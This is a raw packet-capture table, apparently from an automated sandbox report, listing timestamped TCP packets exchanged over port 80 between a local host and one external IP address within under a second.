Sep 27, 2024 04:21:06.800601006 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.885978937 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.885993958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886006117 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886034012 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886059999 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886073112 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886084080 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886126041 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886185884 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886271000 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886290073 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886301994 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886317968 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886332989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886353970 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886382103 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886543989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886588097 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886600018 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886604071 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886631012 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886646032 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886661053 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886699915 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886883020 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886936903 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.886948109 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886960030 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.886989117 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887012959 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887022972 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887033939 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887044907 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887057066 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887063980 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887073040 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887088060 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887155056 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887166023 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887172937 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887180090 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887242079 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887717009 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887761116 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887763023 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887774944 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887803078 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887818098 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887830973 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887842894 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887854099 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887892962 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887911081 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.887969017 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887981892 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.887994051 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888005018 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888016939 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888027906 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888029099 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888056040 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888091087 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888685942 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888698101 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888710976 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888731003 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888751030 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888784885 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888797045 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888807058 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888819933 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888834953 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888853073 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888856888 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888905048 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888912916 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888916969 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.888942957 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.888958931 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.890965939 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.891032934 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976491928 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976541042 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976553917 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976564884 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976577997 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976591110 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976589918 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976612091 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976623058 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976628065 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976644039 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976656914 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976664066 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976686954 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976696968 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976700068 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976708889 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976739883 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976741076 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976751089 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976752996 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976764917 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976778984 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976795912 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976809025 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976809978 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976839066 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976850033 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976850033 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976877928 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976893902 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976928949 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976942062 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976953030 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.976979971 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.976994991 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977085114 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977097034 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977108955 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977134943 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977161884 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977174997 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977186918 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977199078 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977224112 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977242947 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977319956 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977363110 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977396965 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977410078 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977433920 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977447033 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977447987 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977478027 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977483988 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977519035 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977555990 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977569103 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977580070 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977611065 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977611065 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977619886 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977622986 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977638006 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977664948 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977679968 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977694035 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977706909 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977718115 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977732897 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977755070 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977771997 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977783918 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977783918 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977807999 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977832079 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977906942 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977919102 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977929115 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977941036 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.977957964 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.977972031 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978086948 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978097916 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978112936 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978125095 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978132963 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978136063 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978149891 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978168964 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978173971 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978188038 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978199959 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978205919 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978219032 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978249073 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978318930 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978329897 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978342056 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978353977 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978364944 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978368998 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978378057 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978389978 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978400946 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978401899 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.978435993 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.978452921 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981548071 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981559992 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981578112 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981587887 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981595039 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981595039 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981609106 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981610060 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981626987 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981651068 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981663942 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981676102 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981693983 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981714010 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981718063 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981731892 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981746912 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981759071 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981770039 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981786966 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981828928 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981841087 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981852055 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981864929 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981877089 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981884956 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981884956 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981889963 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981911898 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981918097 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.981941938 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.981967926 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.982140064 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.982151985 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.982163906 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.982176065 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.982182980 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.982193947 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.982196093 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.982215881 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.982239962 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.066962957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.066987991 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.066998959 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067015886 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067048073 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067049026 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067049026 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067061901 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067073107 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067087889 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067090988 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067102909 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067109108 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067145109 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067152023 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067163944 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067190886 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067210913 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067224026 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067225933 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067248106 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067249060 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067267895 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067296982 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067316055 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067328930 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067339897 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067346096 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067377090 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067419052 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067425013 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067439079 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067449093 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067460060 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067471027 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067472935 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067488909 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067516088 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067519903 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067543983 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067564964 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067593098 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067611933 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067625046 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067648888 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067661047 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067688942 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067703962 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067718029 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067725897 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067729950 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.067749023 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.067770004 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068206072 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068255901 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068257093 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068269014 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068308115 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068322897 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068341017 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068351984 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068362951 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068373919 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068386078 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068417072 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068501949 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068512917 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068523884 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068536043 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068547010 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068557978 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068558931 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068571091 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068573952 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068592072 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068614006 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068806887 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068819046 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068829060 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068839073 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068850040 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068851948 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068861961 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068861961 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068871021 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068881989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068893909 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068897009 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068907976 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.068917036 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.068954945 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069004059 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069016933 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069027901 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069039106 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069048882 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069053888 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069055080 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069081068 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069094896 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069117069 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069128990 CEST	80	49713	194.116.215.195	192.168.2.5
